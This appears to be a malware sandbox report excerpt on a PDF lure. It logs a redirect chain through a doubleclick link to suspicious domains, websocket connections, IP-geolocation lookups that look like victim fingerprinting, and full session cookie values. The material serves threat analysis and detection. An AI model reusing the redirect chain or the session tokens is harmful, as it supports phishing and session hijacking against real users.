XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3DSec-WebSocket-Key: RcYZk8HfweyeKO95vqNL+A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3DSec-WebSocket-Key: Ys1v6CYsq6CAUXHsI+n92w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /81.181.60.92/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /81.181.60.92/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3DSec-WebSocket-Key: jnoCLA/AeacloZYUGfcd/Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNXY2lYTkZ1bjFBVVlXZW1rZUZTT1E9PSIsInZhbHVlIjoiOSttem5xem40UnB4U2h3SVJNNTR6WnhndldtWXhGVm1Gem13TkFrS29rKy9vMTJ1eVJ4WE02SEw1VVprcDRuSnVPa0FPNTgvNXdVSGJvVGkxc0l3bmc3NE9OSU5Pd3RGMUQ5WjJTaVdmakFwTHhTeHNiWWFabEN0ci9MOWp3MTUiLCJtYWMiOiIxMWExNTU4NzU4M2MyZjBiY2Q1YTM1Njc4YTY5ZmVhZTk3ZjcyNGYyODc5MDhiZjQ5YzAwYjZhZTc5MjhmMjk0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImNBU0E1ejZYUnUwaXFOemxlTWozOEE9PSIsInZhbHVlIjoiQmJMcFVTN041QThWYzRZL1J1QlU2VUE1U2VUbkNOYUMrLzlxc2N6VkczMVpkcmpqQkhZTVp1anUzZ3NFMnh4clBmQUQ3WkNoeS9tVkFkVlJZckcxdlJjWG1iMnVuTXNJcEtiN1NZRDVybStpbGg3cWFLcXdIczZUSnRndVo2RG4iLCJtYWMiOiI0YTZmYmY5NWExZmQ0NmQ4NmQyMTYyMmUyNWFhNmIwNmFjYTZhYmRjMjBhZmI2YzIzNjA1ZGI1MTRiOTVhNjYxIiwidGFnIjoiIn0%3DSec-WebSocket-Key: sxThGzGTz59bFMVr881xWw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficDNS traffic detected: DNS query: telefornication.com
      Source: global trafficDNS traffic detected: DNS query: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: httpbin.org
      Source: global trafficDNS traffic detected: DNS query: ipapi.co
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2744sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 84d6ba6304ae385sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 18:12:31 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-Encoding
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 18:12:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzQrYwphdkQ9cRlxtCzeadwr8bJsrSW5JVzzaf%2Fj2CvBEQvx%2BPRky%2FVJ42nvfO54nnICGL9l21TisUaXQLbX%2Bv7EK%2FAnmEFTxrJcF2Cm4kSNFS%2FH5hHbHpaXQBDfvQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 11301Server: cloudflareCF-RAY: 880b6b3ebdc5eb3b-SEA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 18:12:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=egtusHH3etoB5UDmbD2AQ5v%2F6UWXSTJh0jYlluZqn41P%2F6jqKRon53ibv7Vh3A3qhYLjF2hUQAMY1xoQdrEtSJLqpywQUF%2BcX6HQ%2FCkXBmbJXs31tUMNUSYImxZm7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 880b6b754baa7526-SEA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 18:12:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2fODDjw9Fq2NzGRFaBeNDOVfo6dNt3cbDeSQxuyRacNmfTBtfKGR%2FgQAXAb64DrXfTTXp%2BvnM76%2BurV4pXVhYVN6mpaPWQ1pQcFzMOy7r%2BFwE4XlmEJaxkuG63MVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 880b6b9a2f007636-SEA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 18:13:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyBwLunhQ%2ByYlfUN34F22uFBH7Cd2HYf63gShBn2iZoqpSmykB7uA4XxYIwHAjOw7i2oAIT4%2BlHi8bSlPYjMFbcAk5PCyRFj%2FUEvwhhQjuBYmicNsxfv6HuIV%2BJeQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 880b6c1fe922c74d-SEA
      Source: Saint Charles Borromeo Seminary-Wprckny.pdfString found in binary or memory: https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//telefornication.com/css/admin
      Source: 3e8038ac-f0ad-448b-964f-7e66cb507353.tmp.3.dr, c72df0f3-6e6d-41d4-8081-bd4bb0d1027f.tmp.3.drString found in binary or memory: https://chrome.cloudflare-dns.com
      Source: chromecache_211.16.drString found in binary or memory: https://cloud.google.com/contact
      Source: chromecache_211.16.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
      Source: chromecache_211.16.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
      Source: chromecache_211.16.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
      Source: chromecache_211.16.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
      Source: chromecache_211.16.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chromecache_211.16.drString found in binary or memory: https://recaptcha.net
      Source: chromecache_211.16.drString found in binary or memory: https://support.google.com/recaptcha
      Source: chromecache_211.16.drString found in binary or memory: https://support.google.com/recaptcha#6262736
      Source: chromecache_211.16.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
      Source: chromecache_211.16.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
      Source: chromecache_211.16.drString found in binary or memory: https://www.apache.org/licenses/
      Source: chromecache_197.16.dr, chromecache_211.16.drString found in binary or memory: https://www.google.com/recaptcha/api2/
      Source: chromecache_211.16.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__.
      Source: chromecache_197.16.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
